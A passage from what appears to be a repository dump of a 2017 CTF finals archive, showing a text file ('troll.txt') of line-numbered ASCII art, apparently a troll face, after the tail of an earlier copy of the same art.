sWQQQQQQQ 32 | QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ 33 | QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ 34 | QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ 35 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/troll/troll.txt: -------------------------------------------------------------------------------- 1 | QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ 2 | QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ 3 | QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ 4 | QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ 5 | QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ 6 | QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ 7 | QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ 8 | QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ 9 | QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ 10 | QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ 11 | QQQQQQQP'.yQQQQQQQQQQQP" xwa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ 12 | QQQQQP'_a._aamQQQW!_yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ 13 | QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. ;wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ 14 | QQ[ j@mQP'adQQP4ga, -????" +jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ 15 | QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ 16 | QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ 17 | QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ 18 | QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'imWWWWWQW?^ ` ]6QQ' yQQQQQ 19 | QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" 
a j/ ]QQf jQQQQQQ 20 | QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc ,aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ 21 | QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ 22 | QQQQQQQQQc-QWQQQQQW6, QWQWQQQk ,c jWQ ]QQQQQQQ 23 | QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ 24 | QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ 25 | QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ 26 | QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ 27 | QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ 28 | QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}mwBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ 29 | QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ 30 | QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW 31 | QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ 32 | QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ 33 | QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ 34 | QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ 35 | --------------------------------------------------------------------------------